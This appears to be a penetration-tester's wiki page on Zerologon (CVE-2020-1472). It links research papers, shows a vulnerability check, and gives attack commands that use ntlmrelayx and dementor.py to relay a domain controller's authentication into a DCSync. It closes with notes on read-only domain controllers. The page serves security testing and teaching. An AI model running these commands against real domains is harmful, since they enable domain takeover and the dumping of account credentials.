Zerologon

CVE-2020-1472

[PDF] Zerologon: Unauthenticated domain controller compromise by subverting Netlogon cryptography (CVE-2020-1472) (Tom Tervoort)
[PDF] Understanding and Exploiting Zerologon (Lucideus)

Check:

https://github.com/SecuraBV/CVE-2020-1472

$ python3 zerologon_tester.py DC01 10.10.13.38

Exploit:

Exploits above will break the domain! Use this technique by @dirkjanm to abuse Zerologon safely:

https://dirkjanm.io/a-different-way-of-abusing-zerologon/

$ ntlmrelayx.py -t dcsync://DC01.megacorp.local -smb2support --no-http-server --no-wcf-server --no-raw-server
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' 10.10.13.37 DC02.megacorp.local

RODC Notes

Checking that a DC is a RODC (see if WRITABLE flag is present):

PS > nltest.exe /dsgetdc:megacorp.local
PS > nltest.exe /dsgetdc:megacorp.local /server:DC1

"When a user authenticates to an RODC a check is performed to see if the password is cached. If the password is cached, the RODC will authenticate the user account locally. If the user’s password is not cached, then the RODC forwards the authentication request to a writable Domain Controller which in turn authenticates the account and passes the authenticated request back to the RODC. Once the user account is authenticated, the RODC makes another request for the replication of the user’s password in a unidirectional replication providing the account has been configured to allow replication. In order to allow the user password to be cached on RODC, you could set up it by configuring the Password Replication Policy."

So when authenticating at a RODC and Password Replication Policy rejects caching the machine password, then STATUS_NO_TRUST_SAM_ACCOUNT may be met.

Last updated 1 year ago